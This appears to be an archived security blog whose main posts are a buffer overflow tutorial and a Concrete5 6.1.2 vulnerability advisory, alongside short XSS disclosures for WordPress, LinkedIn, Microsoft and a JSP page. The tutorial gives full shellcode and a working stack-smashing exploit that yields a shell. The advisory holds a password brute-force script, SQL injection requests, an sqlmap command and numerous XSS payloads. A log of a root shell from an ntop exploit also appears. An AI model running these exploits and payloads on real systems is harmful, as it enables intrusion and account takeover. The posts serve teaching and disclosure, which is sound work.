This document was created to consolidate knowledge about buffer overflows.
1. Why does the exploit not work on modern systems?
Because as new programs, systems and protections are developed, attackers
have to work on new techniques to bypass those protections.
2. How do we check which security settings our system has?
On a machine like mine (Debian 7, where `uname -a` reports:
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux)
we can do it in a few ways, for example:
a) ldd - print shared library dependencies
Typing:
$ ldd <ourprog>
a few times, we can check whether the addresses in memory change. This helps
us determine whether our system has so-called ASLR(1) enabled.
b) we can also check whether ASLR is enabled by default by reading the value
of the 'randomize_va_space' file:
$ cat /proc/sys/kernel/randomize_va_space
Any value other than 0 tells us that addresses will be randomized.
For learning purposes it's good to change this (default) value
to zero. We can do it with:
# echo "0" > /proc/sys/kernel/randomize_va_space
c) Tobias Klein(2) wrote a nice tool to check which security settings
were compiled into our binary. You can find this tool on his page(2).
3. Where can we start?
We can start anywhere we find a computer. ;)
A better question is: what should we know to start understanding,
instead of only retyping examples from books and articles?
So, a short list:
-- programming in C (you don't need to be an 'ace'; you only need a few
chapters from any book about C where you will find information about
arrays, pointers, reading and displaying characters and probably a few
things about memory management).
-- programming in Python - because many tools (for example fuzzers) can
be created really fast.(3)
-- ASM - the magic and the scare, super difficult and super easy at the
same time. In my case the best way to learn it was paper and pen (4):
writing down the names of the registers (for example Intel's), what they mean and
what we can use them for. A nice way to memorize them.
The next step is getting used to all the super-magic mnemonics like add, movl, call
and so on. (You can write them down too. The more you practice, the better.)
-- if it's still not enough for you, a good start is also:
$ man gcc
(try here (5)) and check which options are available during
compilation (this will be useful for understanding which protections
you can disable at the compilation stage.)
4. Example
We will need some example vulnerable to attack.
On my blog I decided to write about a few cases of how to exploit RCE
in webapps (6), so in a similar way we will try to find a vulnerable
example in C:
https://github.com/search?q=extension%3AC+strcpy%28argv[1]%29&ref=cmdform
Searching this way we will find a few examples of 'lessons' described
by someone else. We will use these examples. The first answer to our search
query is a program called 'vulnerable.c':
---<code>---
#include <string.h>

/* Deliberately vulnerable: strcpy() copies argv[1] into a 512-byte
 * stack buffer without any length check. */
int main(int argc, char *argv[])
{
    char buffer[512];
    if (argc > 1)
        strcpy(buffer, argv[1]);
    return 0;
}
---<code>---
Making sure that the 'randomize_va_space' file has the value '0', we compile(7)
our vulnerable program with these options:
* -ggdb - "Produce debugging information for use by GDB"
* -g - "Produce debugging information in the operating system's native format"
* -fno-stack-protector - disables GCC's stack protector, so the overflow is not caught by a stack canary
k@debian:~/src/bugz$ gcc vulnerable.c -o vulnerable -ggdb -g -fno-stack-protector
We will fill our program's buffer so that it overflows.
$ gdb -q ./vulnerable
(gdb) r `perl -e 'print "A"x524,"B"x4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "A"x524,"B"x4'`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
Ok. The program crashed.
Now we will get a shellcode (from Metasploit on BackTrack5(8)).
To generate it, we will use 'msfpayload':
root@bt:/pentest/exploits/framework3# msfpayload linux/x86/exec CMD=dash R |
msfencode -a x86 -e x86/alpha_mixed -b "\x00\x0a\x0d" -t c
[*] x86/alpha_mixed succeeded with size 142 (iteration=1)
unsigned char buf[] =
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56"
"\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68"
"\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b"
"\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34"
"\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58"
"\x61\x58\x4d\x4f\x70\x41\x41";
This command gives us a shellcode ready to use as part of our buffer value.
To get this working we must remember to subtract the length of our shellcode
(142 bytes in this case) from our 'overflow' value (524*"A").
To exploit this vulnerability we need the following layout:
[ A*382 ] + [ shellcode ] + [ B*4 ]
so that EIP (the instruction pointer, which holds the address of the current
instruction) is set to our "BBBB" string.
So now in 'gdb' we will use this string:
(gdb) r `perl -e 'print "A"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a
\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42
\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39
\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51
\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53
\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50
\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41","B"x4'`
Our output should look like this:
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp esp
eip 0x42424242 0x42424242
ebp 0x4141704f 0x4141704f
esp 0xbffff540 0xbffff540
Ok. Now we must locate the beginning of our shellcode in memory:
(gdb) x/600wx $esp
(...)
0xbffff880: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff890: 0x41414141 0x41414141 0x41414141 0xc6d9e189
0xbffff8a0: 0x58f471d9 0x49495950 0x49494949 0x49494949
0xbffff8b0: 0x43434343 0x51374343 0x58416a5a 0x30413050
(...)
Ok. Let's check that the address gdb reports is really the one we want to
return to with our overflow:
(gdb) x/s 0xbffff890
0xbffff890: 'A' <repeats 12 times>"\211, \341\331\306\331q\
364XPYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICZVkV8Z9
CbE6CXVMRCLIZGCXToQcPhEPRHVOPbE9PnMYKSCbIxC5C0GpGpE4QqPsPhGpCgV3
LIXaXMOpAABBBB"
Almost good.
Instead of the letter "A" we will use the NOP ("no operation") instruction. It
lets us 'slide' down to our address (where we want to return). Instead
of the "B" value mentioned above, let's use the address we found before:
(gdb) r `perl -e 'print "\x90"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50
\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37
\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32
\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56
\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a
\x47\x43\x58\x54\x6f\x51\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45
\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47
\x70\x45\x34\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58
\x61\x58\x4d\x4f\x70\x41\x41","\x90\xf8\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "\x90"x382,
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49
\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30
\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50
\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36
\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68
\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62
\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50\x68
\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41",
"\x90\xf8\xff\xbf"'`
process 4336 is executing new program: /bin/dash
$ uname -a
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux
$
And that's all. Now we have exploited a buffer overflow vulnerability.
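As an added example (my own code, not from the original post), here is the same strcpy() pattern next to a bounded copy that rejects oversized input; the function names, the helper that exercises the check and the BUF_SIZE constant are assumptions of this example.

```c
/* Added example, not from the original post: the strcpy() defect from
 * vulnerable.c next to a bounded copy. Function names and BUF_SIZE are
 * assumptions made for this example. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same buffer size as vulnerable.c */

/* The original pattern: no length check, so an argument longer than
 * 511 bytes runs past the buffer into the saved EBP and return address. */
void copy_arg_unsafe(char *buffer, const char *arg)
{
    strcpy(buffer, arg);
}

/* Bounded copy: returns 0 on success, -1 when the argument plus its
 * terminating NUL does not fit. On failure the buffer is left empty so a
 * caller cannot accidentally use a half-copied string. */
int copy_arg_checked(char *buffer, size_t buf_size, const char *arg)
{
    size_t len;
    if (buffer == NULL || arg == NULL || buf_size == 0)
        return -1;
    len = strlen(arg);
    if (len >= buf_size) {
        buffer[0] = '\0';
        return -1;
    }
    memcpy(buffer, arg, len + 1);  /* len + 1 copies the NUL as well */
    return 0;
}

/* Would an argument of arg_len bytes overflow a buffer of buf_size bytes?
 * The 524*"A" + "BBBB" input from the gdb session is 528 bytes, so it does. */
int would_overflow(size_t arg_len, size_t buf_size)
{
    return arg_len + 1 > buf_size;
}

/* Exercise the check with a synthetic argument of n 'A' bytes. Returns the
 * copy_arg_checked() result, or -2 if n is too large for the scratch array. */
int check_arg_of_length(size_t n)
{
    char buffer[BUF_SIZE];
    char arg[1024];
    if (n >= sizeof arg)
        return -2;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return copy_arg_checked(buffer, sizeof buffer, arg);
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc > 1) {
        if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
            fprintf(stderr, "argument too long: %zu bytes, limit is %d\n",
                    strlen(argv[1]), BUF_SIZE - 1);
            return 1;
        }
        printf("copied %zu bytes safely\n", strlen(buffer));
    }
    return 0;
}
```

Compiled with gcc's default options (without -fno-stack-protector), the unsafe version would additionally abort on the canary check when main returns; the bounded copy never reaches that point because the oversized argument is rejected up front.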
Thanks!
1) ASLR
http://en.wikipedia.org/wiki/Address_space_layout_randomization
2) Tobias Klein -
http://www.trapkit.de
3) Python
https://wiki.python.org/moin/BeginnersGuide
http://en.wikibooks.org/wiki/Python_Programming
4) ASM
http://en.wikibooks.org/wiki/X86_Assembly
5) GCC
http://gcc.gnu.org/releases.html
6) Finding vulnerabilities at github.com
http://hauntit.blogspot.com/2013/06/en-rce-another-lesson.html
7) GCC Debugging options
http://gcc.gnu.org/onlinedocs/gcc-4.1.2/gcc/Debugging-Options.html
8) Metasploit
http://www.metasploit.com
Tuesday, 10 December 2013
Tuesday, 19 November 2013
[EN] Microsoft's bug bounty - updated
Yesterday was a day full of surprises.
Another nice email, this time from MS ;)
* Update @ 05.12.2013 *
http://technet.microsoft.com/en-us/security/cc308589.aspx
Thanks! ;)
Remember responsible disclosure!
Cheers,
o/
Tuesday, 29 October 2013
[EN] JSP Code Review - part 1
During pentesting of webapps in various companies, it often happens that
a few pages are written in JSP.
I described here a few different cases of testing webapps - by white box and/or black box
testing - so today I decided, why not do it again for JSP-based pages? ;)
For our purpose, we can find a great example on one of the tutorial pages,
in the section called 'HTTP Header Request Example'. Below I will show you
how we can check whether this or that (or part of ;)) page is vulnerable to attacks.
(In case you don't know how to prepare your virtual environment for testing
JSP-based pages, check this site. There you will find a nearly step-by-step list
for installing Tomcat with Java on your Linux box. If you have any trouble,
leave me an email or a comment below.)
Ok. Let's get back to our JSP tutorial.
The example code will show the headers of a request to our 'test page'.
---<code>---
<%@ page import="java.io.*,java.util.*" %>
<html>
<head>
<title>HTTP Header Request Example</title>
</head>
<body>
<center>
<h2>HTTP Header Request Example</h2>
<table width="100%" border="1" align="center">
<tr bgcolor="#949494">
<th>Header Name</th><th>Header Value(s)</th>
</tr>
<%
    Enumeration headerNames = request.getHeaderNames();
    while(headerNames.hasMoreElements()) {
        String paramName = (String)headerNames.nextElement();
        out.print("<tr><td>" + paramName + "</td>\n");
        String paramValue = request.getHeader(paramName);
        out.println("<td> " + paramValue + "</td></tr>\n");
    }
%>
</table>
</center>
</body>
</html>
---<code>---
Ok. Let's save this code as 'headers.jsp'.
It's no problem to test this site using Burp, as described
in a few mini-articles here, but in this case we will do a little 'code review'. ;)
A few short examples were also described here or here. So here we will use a
similar trick. We know that if user input is not (properly) sanitized,
then it's possible to inject code into the web page.
So now we will search for 'something' that prints out 'text' (a string) supplied
by the user. In our JSP, it will be the function out.print. Let's find out if we can
grep for this string in our source code:
# cat -n header.jsp | grep out.print
17 out.print("<tr><td>" + paramName + "</td>\n");
19 out.println("<td> " + paramValue + "</td></tr>\n");
#
Yes, we can. ;)
We can see 2 lines, both with 'some parameter/value names'.
Let's find out what those are:
(...)
String paramName = (String)headerNames.nextElement();
(...)
It seems to be some 'string'; let's check the other 'parameter':
# grep paramValue header.jsp
String paramValue = request.getHeader(paramName);
out.println("<td> " + paramValue + "</td></tr>\n");
#
Great. So now we can see that 'paramName' comes from the request, and that the
header value is read with the getHeader() function. And because it's not filtered
in any way before being printed out, we can try to inject some code here.
Let's check if we can change one of the presented headers; for example,
let's change the User-Agent.
To do that we can use Tamper Data or the mentioned Burp Proxy (but honestly,
in my opinion, for this kind of 'simple checking' Tamper Data is fine).
Let's catch the request to the server (our 'header page' in JSP) and then
change the User-Agent value to our favourite 'XSS payload':
[Screenshot: tampered header]
As a response to this unfiltered input, we can see the nice old XSS alert box ;)
[Screenshot: XSS in JSP webapp]
Good luck with code review!
If you have any questions - as always - leave me an email. ;)
Cheers
o/
Wednesday, 9 October 2013
[EN] Testing format strings bugs
A few weeks ago I wrote a short post about where you can find examples
to learn RCE vulnerabilities and how to exploit them.
Today I would like to present a similar story, this time for format string attacks.
A few examples of vulnerable code you will find here. ;)
If you have any questions feel free to ask, but once again:
I will help you only with legal ideas, so please do not send me emails
saying that you want to steal someone's database ;) Thanks.
Enjoy!
o/
[EN] Wordpress 3.6.1 XSS
"Houston we've got a problem..." ;)
... in the latest (3.6.1) Wordpress:
Same story as before, but it seems not to be patched anyway:
Enjoy, because 'it can not be used' - right? ;)
* Update @ 17/10/2013 *
Check the file 'options-discussion.php' in the /wp-admin/ directory, lines 187-202.
There you will find:
---<code>---
187 <?php
188 $ratings = array(
189 /* translators: Content suitability rating: http://bit.ly/89QxZA */
190 'G' => __('G — Suitable for all audiences'),
191 /* translators: Content suitability rating: http://bit.ly/89QxZA */
192 'PG' => __('PG — Possibly offensive, usually for audiences 13 and above'),
193 /* translators: Content suitability rating: http://bit.ly/89QxZA */
194 'R' => __('R — Intended for adult audiences above 17'),
195 /* translators: Content suitability rating: http://bit.ly/89QxZA */
196 'X' => __('X — Even more mature than above')
197 );
198 foreach ($ratings as $key => $rating) :
199 $selected = (get_option('avatar_rating') == $key) ? 'checked="checked"' : '';
200 echo "\n\t<label><input type='radio' name='avatar_rating' value='" . esc_attr($key) . "' $selected/> $rating</label><br />";
201 endforeach;
202 ?>
---<code>---
Because there is no check whether the 'rating' is valid, we can put any
JavaScript/HTML code we want into the 'avatar_rating' parameter. In this case reflected XSS is possible.
To patch this bug, we need to edit the wp-includes/pluggable.php file and change line 1662 as below:
[Screenshot: changed pluggable.php file]
Simply change this line and add Wordpress's 'esc_html' function.
Now it should be ok. ;)
Friday, 4 October 2013
[EN] osCommerce 2.3.3.4 Exploited
Hi ;)
During a few projects I sometimes find that customers are using osCommerce
on their servers.
I prepared a small (PoC) tool to automate a little the process of password cracking
and exploiting the RCE available in the admin panel (again ;) ).
Like I said, this won't be public until next week, sorry.
Anyway, if you think you will need it before then (to test your sites or
your customers') then feel free to let me know privately, via email as always.
Have a nice day
o/
Monday, 30 September 2013
[EN] XSS at Microsoft page
Hi,
during bug bounty tests I decided to try Microsoft's page.
After a while, I found one bug.
Of course there was nice contact about the whole case, but
after asking about any response - no contact to this day. :)
So... public ;)
Similar story to the one described a few minutes ago about linkedin.com.
* Update @ 11/10/2013 *
Finally I've got an answer about this case, and it should be presented on their page.
In case of any news I will publish the details here.
Enjoy and remember to do only legal things ;)
Cheers
o/
[EN] Another XSS at LinkedIn.com
Hi,
during a few tests in a few different bug bounty programs,
on 19.09 this year I found another persistent XSS in our nice job portal
www.linkedin.com
From emails with IT support I think it is patched now, but
if you want to try - here you have a short list of steps to reproduce:
1. Log in to your account
2. Go to contact lists, to 'imported contacts'
3. Edit one contact
4. In the new window, for the edited person, the surname field is vulnerable
to persistent XSS.
Below, a screen from a sample 'attack':
* Update @ 01.10.2013 *
'Seems to be patched in production.' ;)
* Update @ 04.10.2013 *
The LinkedIn Team once again surprised me with their answer. :)
This is a really good Team!
Good job guys!
Enjoy and remember, do only legal things ;)
Cheers
o/
Wednesday, 25 September 2013
[EN] IPBoard 3.x Updates
Yesterday I saw a new post on the IPBoard Community Forum about a few
new vulnerabilities and patches.
If you're using the mentioned version(s) I would recommend you to update as soon as you can.
"How to do it" was described on the forum page.
Big thanks to the guys from IPB Support for a fast response and great job!
Keep going! ;)
Friday, 16 August 2013
[EN] Friday... ;)
root@bt:~/src/ntop/ntop-1.1$ ./entop
SIOCGIFADDR error: 1Û¸·ªªª%·UUUSSÍ1Û¸ªªª%UUUSSÍë^1ÀFF
V
° N
ó
Í1ÛØ@ÍèÜÿÿÿ/bin/shàìÿ¿àìÿ¿/
errno=19
ntop v.1.1 MT [i686-pc-linux-gnu] listening on ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
Host Act -Rcvd- Sent TCP UDP ICMP sh-4.1# uid=0(root) gid=0(root) groups=0(root)
sh-4.1#
(;
Monday, 12 August 2013
[EN] Concrete5 6.1.2 Multiple Bugs
From SQL injection through multiple XSS to information gathering...
Enjoy:
Starting with the description of bugs available to a logged-in admin user, I should mention
that there is no anti-bruteforce mechanism, so if the admin's password is 'simple',
we can crack it, as described below:
Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py
#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys

username = 'admin'
path = '/index.php/login/do_login/'

print('\n_________________________________________________')
print('>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n')
print('If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n')

# target base URL is the first command-line argument
url = sys.argv[1] + path

with open('passwords.txt', 'r') as pwdfile:
    read_pass = pwdfile.readlines()

for test_pass in read_pass:
    data = {
        'uName': username,
        'uPassword': test_pass,
        'rcID': '',
        'submit': 'Sign+In+%3E',
    }
    # first request only to obtain a session cookie for the login attempt
    get_cookies = requests.post(url)
    conn = requests.post(url, data=data, cookies=get_cookies.cookies)
    print('[ > ] Status code for this request: ', conn.status_code)
    lines = conn.text
    # the logged-in dashboard contains the word 'Currently'
    if 'Currently' in lines:
        print('[+] Logged in as: [', username, '] with password: [', test_pass, ']')
---< code >---
So once we have the admin password, we can start from...
1. SQL injection
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"
8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"
11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"
14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"
AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"
'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"
8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"
<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"
Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"
170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"
0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"
1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
Because the "_bf[BLOCK_" parameters are not properly filtered, we can use them to generate an SQL error, like this:
---< response >---
<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">< Back to Home</a></p>
</div>
---< response >---
To reproduce this vulnerability you can use the sqlmap tool:
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"
2. DOM-based XSS
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119
-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain
sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"
');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"
1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"
-----------------------------55721791519552--
---< request >---
---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---
3. SQL error to check
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
Response:
<h1>An unexpected error occurred.</h1>
<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID) inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID) where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">< Back to Home</a></p>
</div>
4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
6. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
8. information disclosure (a non-numeric numResults becomes 0 and the resulting PHP warning leaks the install path):
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>
</div>
<div class="ccm-pane-footer">
9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
10. information disclosure (an uncaught PHP fatal error leaks the install path and file layout):
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html
Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134
11. xss
---< request >---
